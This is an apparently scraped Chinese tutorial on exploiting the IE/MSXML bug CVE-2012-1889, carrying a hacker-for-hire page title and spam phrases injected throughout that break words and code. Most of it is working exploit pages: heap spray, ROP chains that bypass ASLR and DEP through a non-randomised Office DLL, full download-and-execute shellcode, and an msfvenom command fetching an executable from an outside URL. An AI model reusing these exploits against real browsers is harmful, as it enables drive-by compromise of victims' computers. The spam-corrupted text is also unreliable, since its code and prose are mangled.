手机真实黑客软件-qq登录-浏览器漏洞入门

hacker 黑客接单 2020-10-28 494 1

qq登录-浏览器漏洞入门

0x00 cve-2012-1889 IE

本文，主要是想纪录一下自身自小白刚开始触碰windows下IE漏洞调节的全过程，也想的是给大量的初学者一个参照的实例教程吧。大神轻喷!

一开始是想干这一洞在xp的ie下的洞，和win7下的洞，随后再找找win8之上edge的洞来学习培训，惦记着把ie的每个版本号的漏洞先摸一摸的，結果发觉只制成了这一2012的老洞，但是做为初学者，我感觉保证这么多早已是很充足了。

本文章内容在非常大水平上谢谢Wins0n大神的blog，Wins0n这里手机上真正黑客软件沒有写win7的exploit，我这边自身科学研究了一下写了win7下ie8的 poc(rop到沒有打开aslr的dll得话和xp上没有什么差别～～～)，另外后边加了一些msf层面的shellcode和meterpreter控制模块(新司机还可以看一下)。

0x01 有关专用工具

windbg

mona配备

immunity debugger

ROPgadegt

配备全过程参考http://drops.wooyun.org/tips/6814

0x02 参考文献

Wins0n菊苣有关cve-2012-1889漏洞的bloghttp://www.programlife.net/heapspray-cve2012-1889-exploit-1.html

黑云上有关mona的应用http://drops.wooyun.org/tips/6814

看冰上的《Exploit 编写系列教程第十一篇：堆喷射技术揭秘》，讲得很精彩纷呈，还必须细心研究

0x03 漏洞概述

cve-2012-1889这一漏洞是在xml解析的全过程中有什么问题。据CVE-2012-1889描手机上真正黑客软件述，Microsoft XML Core Services 中的漏洞很有可能容许远程控制实行编码。微软中国将该漏洞序号为MS12-043，其叙述是：“Microsoft XML Core Services 解决运行内存中的目标的 *** 中存有一个远程控制实行编码漏洞。假如客户查询包括特别 *** 內容的网址，则该漏洞很有可能容许远程控制实行编码。取得成功运用此漏洞的 *** 攻击能够彻底控制受影响的系统软件。 *** 攻击可接着程序安装；查询、变更或删掉数据信息；或是建立有着彻底用户权限的新账号。这些账号被配备为有着较少系统软件用户权限的客户比具备管理用户权限的客户遭受的危害要小。”（实际是什么，仿佛有点儿难剖析，自身这儿先着眼于的是漏洞的运用，还没有到漏洞原理的剖析，手机上真正黑客软件之后还有机会再剖析）

0x04 Heapspray

堆喷涌(Heap Spray)是一种payload传送技术性，依靠堆来将shellcode置放在可预测分析的堆详细地址上，随后平稳地跳进shellcode。为了更好地完成heap spray，你需要在被劫持EIP前，可以先分派并添充堆内存块。“必须..可以..”的意思是在开启运行内存奔溃前，你务必可以在目标程序中分派可控性运行内存数据信息。浏览器早已因此出示了一种非常简单的方式，它可以适用脚本 *** ，可立即依靠javascript或是vbscript在开启漏洞前分配内存。堆喷涌的应用并不拘泥于浏览器，比如你也能够在Adobe 手机上真正黑客软件 Reader中应用Javascript或是Actionscript将shellcode置放在可预测分析的堆详细地址上。

4.1-BSTR目标

我们在浏览器运行内存里边分派字符串数组的情况下，最后在运行内存上都会被变换变成BSTR字符串数组目标

因此大家具体的字符串数组的字节以下

(length of the string * 2) 4 手机上真正黑客软件 bytes (header) 2 bytes (terminator)

由于堆与堆分派是明确的，立即假定，假如你再次分配内存块，调节器可能在持续/相邻的详细地址分派堆块（分派充足大的堆块，并非从后端开发调节器的前端开发获得分派），最终分派的运行内存块可能遮盖过某一详细地址，最少是可预测分析的详细地址。尽管初次分派的起止详细地址是可变性，但运用堆喷涌，在分派一定频次的运行内存块后，就可以在可预测分析的详细地址上分派到运行内存块。

大家早已了解根据javascript中的字符串数组自变量来分配内存，在所述事例中所应用的字符串数组非常少，而shellcode一般都较为大，但相对性堆中能用的虚拟内存设置而言還是较为少的。理论上，我们可以分派一系列自变量，而手机上真正黑客软件每一个自变量又包括有shellcode，随后大家再想方设法跳进在其中一个自变量所属的运行内存块。数次在运行内存中分派shellcodle，大家将用由下列两一部分数据信息构成运行内存块来喷涌堆块：

nops（很多nop命令）

shellcode（置放在喷涌块的尾端）

假如所应用的喷涌块充足大，那麼运用Win32服务平台下堆块分派粒度分布，就可精准定位堆详细地址，这也代表着堆喷涌以后，每一次都能跳进nops中。假如跳至Nops，那麼大家就会有机遇实行shellcode。下边便是一张堆块分派主视图：

将全部的堆块相接置放在一块，就可以结构出一大块由nops shellcode堆块构成的运行内存块。喷涌前后左右的堆内存主视图以下：

4.2-BSTR目标和堆块的关联

大家了解了BSTR和堆喷涌的基本概念以后，下边便是要了解好的BSTR和堆块的关联。

当分派一个字符串数组时，它会被转化成BSTR目标。为了更好地在堆块中储存目标，会先往堆要求一个运行内存块。那麼这一内手机上真正黑客软件存块有多大呢？是不是与BSTR目标的尺寸同样呢？或是更高？假如更高得话，那麼BSTR目标是不是也会一块置放在同一堆块中？或是堆仅仅简易地分配一块新的堆块？若是如此，那麼结构出去持续堆块以下所显示：

大家便是要防止

0x05 windows-xp IE6

ida剖析一下msxml3.dll，能够见到0x5dd8d7d5这儿是mov ecx,[eax],eax是堆详细地址，上边的內容我手机真正黑客软件们是可控性的.

0x5dd8d7ea处的call dword ptr[ecx 18h]，能够开展eip的迁移。

看第之一份poc

手机上真正黑客软件 7

<html>

手机上真正黑客软件 <head>

</head>

<body>

手机上真正黑客软件 <script>

var obj = document.getElementById('poc').object;

var src = unescape("??");

&手机上真正黑客软件nbsp; while (src.length < 0x1002) src = src;

src = "\\\\\\\\xxx" src;

src = src.substr(0, 0x1000 - 10);

手机上真正黑客软件 var pic = document.createElement("img");

pic.src = src;

pic.nameProp;

&手机上真正黑客软件nbsp; obj.definition(0);

</script>

</body>

</html>

windbg额外到过程上边去，大家看来堆的分配原则。能够见到大家的堆块喷涌

第二份shellcode为 download_exec的poc

手机真实黑客软件 18

手机真实黑客软件 32

手机真实黑客软件 46

<html>

手机真实黑客软件 <head>

</head>

<body>

&手机真实黑客软件nbsp;<object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id='poc'></object>

var shellcode = 手机真实黑客软件 "\u10EB\u4A5A\uC933\uB966\u013C\u3480\u990A\uFAE2\u05EB\uEBE8\uFFFF\u70FF\u994C\u9999\uFDC3\uA938\u9999\u1299\u95D9\uE912\u3485\uD912\u1291\u1241\uA5EA\uED12\uE187\u6A9A\uE712\u9AB9\u1262\u8DD7\u74AA\uCECF\u12C8\u9AA6\u1262\uF36B\uC097\u3F6A\u91ED\uC6C0\u5E1A\uDC9D\u707B\uC6C0\u12C7\u1254\uBDDF\u5A9A\u7848\u589A\u50AA\u12FF\u1291\u85手机真实黑客软件DF\u5A9A\u7858\u9A9B\u1258\u9A99\u125A\u1263\u1A6E\u975F\u4912\u9DF3\u71C0\u99C9\u9999\u5F1A\uCB94\u66CF\u65CE\u12C3\uF341\uC098\uA471\u9999\u1A99\u8A5F\uDFCF\uA719\uEC19\u1963\u19AF\u1AC7\uB975\u4512\uB9F3\u66CA\u75CE\u9D5E\uC59A\uB7F8\u5EFC\u9ADD\uE19D\u99FC\uAA99\uC959\uCAC9\uC9CF\uCE66\u1265\uC945\u66CA\u69CE\u66C9\u6DCE\u59AA\u1C35\uEC59\uC860\uCFCB\u66CA\uC34B\u32C0\u777B\u59AA\u715A\u66BF\u6666\uFCDE\uC9ED\uF6EB\uD8FA\uFDFD\uFCEB\uEAEA\uDE99\uEDFC\uE0CA\uEDEA\uF4FC\uF0DD\uFCEB\uEDFA\uEBF6\uD8E0\uCE99\uF7F0\uE1DC\uFAFC\uDC99\uF0E1\uCDED\uEBF1\uF8FC\u99FD\uF6D5\uFDF8\uF0D5\uEBFB\uEBF8\uD8E0\uEC99\uF5EB\uF6F4\u99F7\uCBCC\uDDD5\uEEF6\uF5F7\uF8F6\uCDFD\uDFF6\uF5F0\uD8FC\u6899\u7474\u3A70\u2F2F\u6574\u7473\u632E\u6D6F\u742F\u7365\u2E74\u7865\u8065";

手机真实黑客软件手机真实黑客软件

var fill = "\u0c0c\u0c0c";

&手机真实黑客软件nbsp; while (fill.length <= 0x100000 / 2){

fill += fill;

}

fill = fill.substring(0, 0x100000/2 - 32/2 - 4/2 - shellcode.length - 2/2);

var slide = new Array();

手机真实黑客软件 for (var i = 0; i < 200; i++){

slide[i] = fill + shellcode;

手机真实黑客软件 }

var obj = document.getElementById('poc').object;

var src = unescape("%u0c0c%u0c0c");

手机真实黑客软件

while (src.length < 0x1002) src += src;

src = "\\\\xxx" + src;

手机真实黑客软件 src = src.substr(0, 0x1000 - 10);

var pic = document.createElement("img");

pic.src =手机真实黑客软件 src;

pic.nameProp;

obj.definition(0);

</script>

手机真实黑客软件

</body>

</html>

Wins0n菊苣给的poc比较稳定，不断下来的话可以直接成功利用。所以我们在msxml.dll加载的时候断下来，用下面的命令。

sxe ld:msxml3

可以看到这次我们的堆喷射位置十分准确。同时如果成功调到了0x0c0c0c0c部分的地址，但手机真实黑客软件是没有成功执行shellcode的话，可以在shellcode前面放上几个0xcc0xcc相当于int 3断点，方便调试。

0x06 win7+IE8环境下的POC

我们还是对着这个msxml3进行逆向（这里还是建议大家用ida加载msxml3的时候把windbg联网下载的pdb文件也加载进来，这样有了符号信息，看的很清楚），这里是漏洞触发还是和xp是一个地方，在这里就是0x6887e2d9这个地方mov ecx,[eax],这里的eax由我们控制。

0x6887e2ee这个地方的call dword ptr [ecx+18h]。

所以我们可以劫持程序流程，win7下程序开启了DEP+ALSR，下面我们就要考虑如何绕过保护措施进行溢出。

我们还是首先借鉴Wins0n菊苣的博客三里面的poc，我们把它跑起来。

Wins0n的第三份poc

5手机真实黑客软件

手机真实黑客软件 20

手机真实黑客软件 34

48手机真实黑客软件

<html>

<head>

<title>CVE 2012-1889 手机真实黑客软件 PoC</title>

</head>

<body>

手机真实黑客软件 // [ Shellcode ]

var shellcode = 手机真实黑客软件"\u10EB\u4A5A\uC933\uB966\u013C\u3480\u990A\uFAE2\u05EB\uEBE8\uFFFF\u70FF\u994C\u9999\uFDC3\uA938\u9999\u1299\u95D9\uE912\u3485\uD912\u1291\u1241\uA5EA\uED12\uE187\u6A9A\uE712\u9AB9\u1262\手机真实黑客软件 u8DD7\u74AA\uCECF\u12C8\u9AA6\u1262\uF36B\uC097\u3F6A\u91ED\uC6C0\u5E1A\uDC9D\u707B\uC6C0\u12C7\u1254\uBDDF\u5A9A\u7848\u589A\u50AA\u12FF\u1291\u85DF\u5A9A\u7858\u9A9B\u1258\u9A99\u125A\u1263\u1A6E\u975F\u4912\u9DF3\u71C0\u99C9\u9999\u5F1A\uCB94\u66CF\u65CE\u12C3\uF341\uC098\uA471\u9999\u1A99\u8A5F\uDFCF\uA719\uEC19\u1963\u19AF\u1AC7\uB975\u4512\uB9F3\u66CA\u75CE\u9D5E\uC59A\uB7F8\u5EFC\u9ADD\uE19D\u99FC\uAA99\uC959\uCAC9\uC9CF\uCE66\u1265\uC945\u66CA\u69CE\u66C9\u6DCE\u59AA\u1C35\uEC59\uC860\uCFCB\u66CA\uC34B\u32C0\u777B\u59AA\u715A\u66BF\u6666\uFCDE\uC9ED\uF6EB\uD8FA\uFDFD\uFCEB\uEAEA\uDE99\uEDFC\uE0CA\uEDEA\uF4FC\uF0DD\uFCEB\uEDFA\uEBF6\uD8E0\uCE99\uF7F0\uE1DC\uFAFC\uDC99\uF0E1\uCDED\uEBF1\uF8FC\u99FD\uF6D5\uFDF8\uF0D5\uEBFB\uEBF8\uD8E0\uEC99\uF5EB\uF6F4\u99F7\uCBCC\uDDD5\uEEF6\uF5F7\uF8F6\uCDFD\uDFF6\uF5F0\uD8FC\u6899\u7474\u3A70\u2F2F\u6574\u7473\u632E\u6D6F\u742F\u7365\u2E74\u7865\u8065";

手机真实黑客软件手机真实黑客软件 // [ ROP Chain ]

// 0x0C0C0C24 -> # retn

// 0x0C0C0C14 -> # xchg eax, esp # retn

手机真实黑客软件 // Start from 0x0c0c0c0c

var rop_chain = "\uBE4C\u77BE" + // 0x77BEBE4C # retn [msvcrt.dll]

手机真实黑客软件 "\uBE4B\u77BE" + // 0x77BEBE4B # pop ebp # retn [msvcrt.dll]

"\u5ED5\u77BE" + // 手机真实黑客软件 0x77BE5ED5 # xchg eax, esp # retn [msvcrt.dll]

"\uBE4C\u77BE" + // 0x77BEBE4C # retn [msvcrt.dll]

手机真实黑客软件 "\uBE4C\u77BE" + // 0x77BEBE4C # retn [msvcrt.dll]

"\uBE4C\u77BE" 手机真实黑客软件 + // 0x77BEBE4C # retn [msvcrt.dll]

"\uBE4C\u77BE" + // 0x77BEBE4C 手机真实黑客软件 # retn [msvcrt.dll]

// The real rop chain

"\ube4b\u77be" 手机真实黑客软件 + // 0x77bebe4b : ,# POP EBP # RETN [msvcrt.dll]

"\ube4b\u77be" 手机真实黑客软件 + // 0x77bebe4b : ,# skip 4 bytes [msvcrt.dll]

"\u6e9d\u77c1" + // 0x77c16e9d : ,# POP EBX # RETN [msvcrt.dll]

手机真实黑客软件 "\uE000\u0000" + // 0x0000E000 : ,# 0x0000E000-> ebx [dwSize]

手机真实黑客软件 "\ucdec\u77c1" + // 0x77c1cdec : ,# POP EDX # RETN [msvcrt.dll]

"\u0040\u0手机真实黑客软件000" + // 0x00000040 : ,# 0x00000040-> edx

"\u79da\u77bf" + // 0x77bf79da : ,# POP ECX # RETN [msvcrt.dll]

&手机真实黑客软件nbsp; "\uf67e\u77c2" + // 0x77c2f67e : ,# &Writable location [msvcrt.dll]

手机真实黑客软件 "\uaf6b\u77c0" + // 0x77c0af6b : ,# POP EDI # RETN [msvcrt.dll]

"\u9手机真实黑客软件f92\u77c0" + // 0x77c09f92 : ,# RETN (ROP NOP) [msvcrt.dll]

"\u6f5a\u77c1" + // 0x77c16f5a : ,# POP ESI # RETN [msvcrt.dll]

手机真实黑客软件 "\uaacc\u77bf" + // 0x77bfaacc : ,# JMP [EAX] [msvcrt.dll]

手机真实黑客软件 "\u289b\u77c2" + // 0x77c2289b : ,# POP EAX # RETN [msvcrt.dll]

"\u1131\u77be" 手机真实黑客软件 + // 0x77BE1131 : ,# ptr to &VirtualProtect() [IAT msvcrt.dll] 0x20-0xEF=0x31

"\u67f0\u77c2" + // 0x77c267f0 : ,# PUSHAD 手机真实黑客软件 # ADD AL,0EF # RETN [msvcrt.dll]

"\u1025\u77c2"; // 0x77c21025 : ,# ptr to 'push esp # ret ' [msvcrt.dll]

手机真实黑客软件 // [ fill the heap with 0x0c0c0c0c ] About 0x2000 Bytes

var fill = "\u0c0c\u0c0c";

while (fill.length < 0x1000){

手机真实黑客软件 fill += fill;

}

// [ padding offset ]

padding 手机真实黑客软件 = fill.substring(0, 0x5F6);

// [ fill each chunk with 0x1000 bytes ]

evilcode = padding + rop_chain + shellcode + fill.substring(0, 0x800 - padding.length - 手机真实黑客软件 rop_chain.length - shellcode.length);

// [ repeat the block to 512KB ]

while (evilcode.length < 0x40000){

手机真实黑客软件 evilcode += evilcode;

}

// [ substring(2, 0x40000 - 0x21) - XP SP3 + IE8 ]

var block = evilcode.substring(2, 手机真实黑客软件 0x40000 - 0x21);

// [ Allocate 200 MB ]

var slide = new Array();

for (var i = 0; i < 400; i++){

手机真实黑客软件 slide[i] = block.substring(0, block.length);

}

// [ Vulnerability Trigger ]

手机真实黑客软件 var obj = document.getElementById('poc').object;

var src = unescape("%u0c08%u0c0c"); // fill the stack with 0x0c0c0c08

while 手机真实黑客软件 (src.length < 0x1002) src += src;

src = "\\\\xxx" + src;

src = src.substr(0, 0x1000 - 10);

手机真实黑客软件 var pic = document.createElement("img");

pic.src = src;

pic.nameProp;

obj.definition(手机真实黑客软件0);

</script>

</body>

</html>

用windbg跟入之后我们发现call指令应该转移的位置的确是在0x0c0c0c0c位置处，精确的堆喷射还是没有错的，但是rop链就不能对了，Wins0n的环境还是winxp我们这里环境是win7+IE8，下面一步一步调。

我们跟到我们call指令发现我们实现是精确的堆喷射，然后但是rop链是有问题的。

绕过ASLR

1.win7相较于win 手机真实黑客软件 xp开启alsr，这样的话dll的地址本来就是随机的，怎么破？

已知绕过aslr的 *** 有三种

使用未开启ASLR的模块

修改BSTR长度/null结束符

修改数组对象

后两种 *** 都有各种局限性，需要附属条件，我这边就没有采取。不过大家可以在这篇文章中学习到姿势。http://www.fireeye.com/blog/technical/cyber-exploits/2013/10/aslr-bypass-apocalypse-in-lately-zero-day-exploits.html

使用未开启ASLR的模块，有几个情况可用。

JRE 手机真实黑客软件 1.6.x包含了一个老版本的C 运行库 MSVCR71.DLL，编译时没有加上/DYNAMICBASE 编译选项。默认情况下,在win7+ie8 和 win7 +ie9 下，这个DLL会以固定地址加载到IE的进程中。

MS Office 2010/2007中的 HXDS.DLL 编译时也没加上相关选项，该技术更先是在http://www.greyhathacker.net/?p=585提出，也是当前在IE 8/9 + win7 环境下使用最频繁的过地址随机化的 *** ，当浏览器加载一个带try location.href 手机真实黑客软件 = ‘ms-help://’语句的页面时，这个DLL就会被加载。

win7下office的帮助模块hsdx.dll没有开启aslr，那么我们就可以用这里固定的ropgadet绕过dep。

try { location.href = 'ms-help://' } catch (e) {}

在html中添加这句话，让浏览器加载hsdx.dll。

构造ROP链来绕过DEP

因为环境不一样，所以我们要来用mona寻找rop链。

建议大家用Immunity 手机真实黑客软件 Debugger下的mona插件找ropchain。

我们尝试了一下在windbg里面用mona好像是崩溃的，于是还是回到Immunity Debugger下用mona找ropchain

!mona rop -m hsdx.dll

可以在结果中看到,hsdx.dll是没有开启ASLR的

其实我后面又看了看，还有一些软件插件也是没有开启alsr的

像这个迅雷的XLFSIO.dll，和qq的accountprotect.dll，都没开启aslr，但是不知道为什么ie会加载这些dll，这么危险，不过这样也给了大家更多的可能性绕过aslr

下面就是mona给出的rop链来关闭掉dep，是绕到了virtualprotect函数给了我们shellcode区域可执行权限。

手机真实黑客软件 25

"\u5253\u51c4" + // 0x51c45253 : ,# POP ESI # RETN [hxds.dll]

手机真实黑客软件 "\u1158\u51bd" + // 0x51bd1158 : ,# ptr to &VirtualProtect() [IAT hxds.dll]

"\u2d2e\u51bd" + // 0x51bd2d2e : ,# MOV EAX,DWORD PTR DS:[ESI] # RETN [hxds.dll]

手机真实黑客软件

"\u9987\u51c3" + // 0x51c39987 : ,# XCHG EAX,ESI # RETN [hxds.dll]

"\u60d6\u51be" + // 0x51be60d6 : ,# POP EBP # RETN [hxds.dll]

手机真实黑客软件 "\ua9f3\u51c4" + // 0x51c4a9f3 : ,# & jmp esp [hxds.dll]

"\u1cbc\u51c4" + // 0x51c41cbc : ,# POP EBX # RETN [hxds.dll]

"\u02手机真实黑客软件01\u0000" + // 0x00000201 : ,# 0x00000201-> ebx

"\ua7d8\u51bf" + // 0x51bfa7d8 : ,# POP EDX # RETN [hxds.dll]

"\u0040\u0000" + // 0x00000040 : ,# 0手机真实黑客软件x00000040-> edx

"\u0f9a\u51c1" + // 0x51c10f9a : ,# POP ECX # RETN [hxds.dll]

"\ubeb3\u51c5" + // 0x51c5beb3 : ,# &Writable location [hxds.dll]

手机真实黑客软件

"\u7642\u51c0" + // 0x51c07642 : ,# POP EDI # RETN [hxds.dll]

"\u5c46\u51c5" + // 0x51c55c46 : ,# RETN (ROP NOP) [hxds.dll]

手机真实黑客软件 "\u5112\u51c4" + // 0x51c45112 : ,# POP EAX # RETN [hxds.dll]

"\u9090\u9090" + // 0x90909090 : ,# nop

"\ua4ec\u51c0&手机真实黑客软件quot; ; // 0x51c0a4ec : ,# PUSHAD # RETN [hxds.dll]

我们的栈没有在我们想要的rop上面，所以上来先进行一次栈转移。这里的xchg eax,ebp ...leave 是可以进行一次栈转移的。下面的ropgadegt是我用ROPgadget分析hsdx.dll找来的,相较于mona，可以发现它们的区别，mona 可以直接生成实现功能的rop链，但是在rop链在实际运用中的调整还是用后者来得更加方便。

ROPgadget --binary /media/share/hxds.dll | grep "pop"

手机真实黑客软件 0x51bf4451 : test dword ptr [esi + ebx*4], ecx ; add byte ptr [eax], al ; mov al, byte ptr [ebp - 1] ; leave ; ret

0x51bd4f78 : xchg eax, ebp ; add eax, 0xc0330000 ; inc eax ; pop edi ; leave ; ret 4

0x51bda961 : xchg 手机真实黑客软件 eax, ebp ; xor eax, eax ; pop ebx ; pop edi ; leave ; ret 0xc

我们注意一步一步来，之一步call指令的状态

windbg的时候，断点的位置下在这里_dispatchImpl::InvokeHelper+0x1c769，0x51c4a9f3

call dword ptr [ecx+18h] //ecx=0c0c0c0c,所以下一步eip指向的是0x0c0c0c24,这里的ecx来自于前面的指令

mov ecx,[手机真实黑客软件eax];//eax=0x0c0c0c08

所以我们先进行一次栈转移，这里我们来用

0x51bda961 : xchg eax, ebp ; xor eax, eax ; pop ebx ; pop edi ; leave ; ret 0xc

这样的话，ebp会变成0x0c0c0c08,然后我们后面的leave指令会进行一次栈转移，使得esp=0x0c0c0c0c

然后我们的ret 0xc，就是相当于add esp,0xc然后把esp的dword（也就是0手机真实黑客软件xc0c0c18）给eip，再把esp+4，所以我们0x0c0c0c18这里是我们下一条指令

好了经过后面的测试发现我们的rop成功的把dep关掉了,然后我们下面就是shellcode的问题（之前跑到了shellcode发现不行，后来换了msf模块化的shellcode,具体下面再讲）

手机真实黑客软件 8

手机真实黑客软件 22

手机真实黑客软件 36

手机真实黑客软件 51

手机真实黑客软件 65

7手机真实黑客软件9

手机真实黑客软件

100

101

102

103

104

105

106

107

手机真实黑客软件 108

109

110

111

112

113

114

115

116

117

118

119

120

手机真实黑客软件 121

122

123

124

125

126

127

128

129

130

131

132

133

134

手机真实黑客软件 135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

<html>

<head>

手机真实黑客软件 </head>

<body>

手机真实黑客软件

try { location.href = 'ms-help://' } catch (e) {};

// 手机真实黑客软件 [ Shellcode ]

var shellcode = unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74手机真实黑客软件c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u6e68%u7465%u6800%u6977%u696e%ue689%u6854%u774c%u0726%ud5ff%uff31手机真实黑客软件%u5757%u5757%u6856%u563a%ua779%ud5ff%u60eb%u315b%u51c9%u6a51%u5103%u6a51%u5350%u6850%u8957%uc69f%ud5ff%u4feb%u3159%u52d2%u0068%u6032%u5284%u5252%u5251%u6850%u55eb%u3b2e%ud5ff%uc689%u106a%u685b%u3380%u0000%ue089%u046a%u6a50%u561f%u7568%u9e46%uff86%u31d5%u57ff%u5757%u5657%u2d68%u1806%uff7b%u85d5%u75c0%u4b1d%u840f%u007a%u0000%ud1eb%u8ce9%u0000%ue800%uffac%uffff%u742f%u7365%u2e74%u7865%u0065%u6beb%uc031%u505f%u026a%u026a%u6a50%u6a02%u5702%uda68%udaf6%uff4f%u93d5%uc031%ub866%u0304%uc429%u8d54%u244c%u3108%ub4c0%u5003%u5651%u1268%u8996%uffe2%u85d5%u74c0%u582d%uc085%u1674%u006a%u5054%u448d%u0c24%u5350%u2d68%uae57%uff5b%u83d5%u04手机真实黑客软件 ec%uceeb%u6853%u96c6%u5287%ud5ff%u006a%u6857%u8b31%u876f%ud5ff%u006a%uf068%ua2b5%uff56%ue8d5%uff90%uffff%u7572%u646e%u3131%u652e%u6578%ue800%uff0a%uffff%u6574%u7473%u632e%u6d6f%u4100");

手机真实黑客软件

// [ ROP Chain ]

手机真实黑客软件

// 0x0C0C0C24 -> # retn

// 0x0C0C0C14 -> # xchg eax, esp # retn

// 手机真实黑客软件 Start from 0x0c0c0c0c

//rop in hxds.dll which is not set aslr in win7

手机真实黑客软件 rop_chain= "\u5c46\u51c5" + // 0x51c55c46 : ,# RETN (ROP NOP) [hxds.dll]

"\u5c46\u51c5" + 手机真实黑客软件 // 0x51c55c46 : ,# RETN (ROP NOP) [hxds.dll]

"\u5c46\u51c5" + // 0x51c55c46 : ,# RETN (ROP NOP) [hxds.dll]

手机真实黑客软件 //this is the two_step rop address

"\u5c46\u51c5" 手机真实黑客软件 + // <- 0x0c0c0c18 0x51c55c46 : ,# RETN (ROP NOP) [hxds.dll]

"\u5c46\u51c5" + // <- 0x0c0手机真实黑客软件c0c18 0x51c55c46 : ,# RETN (ROP NOP) [hxds.dll]

"\uc0bf\u51bd" + // <- 0x0c0c0c20 0x51bdc0bf : xor eax, eax ; pop ecx ; ret

手机真实黑客软件

//real rop_chain

"\ua961\u51bd" 手机真实黑客软件 + // <- 0x0c0c0c24 0x51bda961 : xchg eax, ebp ; xor eax, eax ; pop ebx ; pop edi ; leave ; ret 0xc

手机真实黑客软件"\u5253\u51c4" + // <- 0x0c0c0c28 0x51c45253 : ,# POP ESI # RETN [hxds.dll]

"\u1158\u51bd" + // 0x51bd1158 : ,# ptr to 手机真实黑客软件 &VirtualProtect() [IAT hxds.dll]

"\u2d2e\u51bd" + // 0x51bd2d2e : ,# MOV EAX,DWORD PTR DS:[ESI] # RETN [hxds.dll]

"\u9987\u51c3" + // 0x51c39987 : ,# XCHG EAX,ESI # RETN [hxds.dll]

手机真实黑客软件 "\u60d6\u51be" + // 0x51be60d6 : ,# POP EBP # RETN [hxds.dll]

"\ua9f3\u51c4" 手机真实黑客软件 + // 0x51c4a9f3 : ,# & jmp esp [hxds.dll]//退出virtualprotect用的

"\u1cbc\u51c4" + // 0x51c41cbc : ,# POP EBX # RETN 手机真实黑客软件 [hxds.dll]

"\u0201\u0000" + // 0x00000201 : ,# 0x00000201-> ebx

&手机真实黑客软件nbsp; "\ua7d8\u51bf" + // 0x51bfa7d8 : ,# POP EDX # RETN [hxds.dll]

"\u0040\u0000" 手机真实黑客软件 + // 0x00000040 : ,# 0x00000040-> edx

"\u0f9a\u51c1" + // 0x51c10f9a : ,# POP ECX # RETN [hxds.dll] 手机真实黑客软件

"\ubeb3\u51c5" + // 0x51c5beb3 : ,# &Writable location [hxds.dll]

手机真实黑客软件 "\u7642\u51c0" + // 0x51c07642 : ,# POP EDI # RETN [hxds.dll]

&手机真实黑客软件nbsp; "\u5c46\u51c5" + // 0x51c55c46 : ,# RETN (ROP NOP) [hxds.dll]

"\u5112\u51c4" + // 0x51c45112 : ,# POP EAX 手机真实黑客软件 # RETN [hxds.dll]

"\u9090\u9090" + // 0x90909090 : ,# nop

手机真实黑客软件 "\ua4ec\u51c0" ; // 0x51c0a4ec : ,# PUSHAD # RETN [hxds.dll]

// 手机真实黑客软件 [ fill the heap with 0x0c0c0c0c ] About 0x2000 Bytes

var fill = "\u0c0c\u0c0c";

while 手机真实黑客软件 (fill.length < 0x1000){

fill += fill;

}

手机真实黑客软件 // [ padding offset ]

padding = fill.substring(0, 0x5F6);

//padding=fill.substring(0,0x60e)

手机真实黑客软件

// [ fill each chunk with 0x1000 bytes ]

evilcode = padding + rop_chain + shellcode + fill.substring(0, 0x800 -手机真实黑客软件 padding.length - rop_chain.length - shellcode.length);

// [ repeat the block to 512KB ]

while (evilcode.length < 0x40000){

evilcode += evilcode;

}

手机真实黑客软件 // [ substring(2, 0x40000 - 0x21) - XP SP3 + IE8 ]

var block = evilcode.substring(2, 0x40000 - 0x21);

// [ Allocate 手机真实黑客软件 200 MB ]

var slide = new Array();

for (var i = 0; i < 400; i++){

手机真实黑客软件 slide[i] = block.substring(0, block.length);

}

// [ Vulnerability Trigger 手机真实黑客软件 ]

var obj = document.getElementById('poc').object;

var src = unescape("%u0c08%u0c0c"); // 手机真实黑客软件 fill the stack with 0x0c0c0c08

while (src.length < 0x1002) src += src;

src = "\\\\xxx" + src;

手机真实黑客软件

src = src.substr(0, 0x1000 - 10);

var pic = document.createElement("img");

手机真实黑客软件 pic.src = src;

pic.nameProp;

obj.definition(0);

&手机真实黑客软件nbsp; </script>

</body>

</html>

shellcode及msf相关

下面我们用msfpayload(kali里面已经改成了msfvenom)模块生成shellcode

参照http://blog.csdn.net/lzhd24/article/details/50664342这里学习怎么生成shellcode，这里我们可以生成各种各样的shellcode，简直帅呆，这里我们来初次体验一下meterpreter这个好玩的东西。

先是生成meterpreter的exe，然后再连接上它。

手机真实黑客软件 1

10手机真实黑客软件

root@kkkkkk:~# msfvenom -p windows/download_exec 手机真实黑客软件 URL=http://test.com/test.exe -f js_le #生成ie里面的js的download&exec的shellcode

No platform was selected, choosing Msf::Module::Platform::Windows from the payload

No Arch selected, selecting Arch: x86 from the payload

手机真实黑客软件

No encoder or badchars specified, outputting raw payload

Payload size: 435 bytes

%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c0手机真实黑客软件2%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%手机真实黑客软件u5d86%u6e68%u7465%u6800%u6977%u696e%ue689%u6854%u774c%u0726%ud5ff%uff31%u5757%u5757%u6856%u563a%ua779%ud5ff%u60eb%u315b%u51c9%u6a51%u5103%u6a51%u5350%u6850%u8957%uc69f%ud5ff%u4feb%u3159%u52d2%u0068%u6032%u5284%u5252%u5251%u6850%u55eb%u3b2e%ud5ff%uc689%u106a%u685b%u3380%u0000%ue089%u046a%u6a50%u561f%u7568%u9e46%uff86%u31d5%u57ff%u5757%u5657%u2d68%u1806%u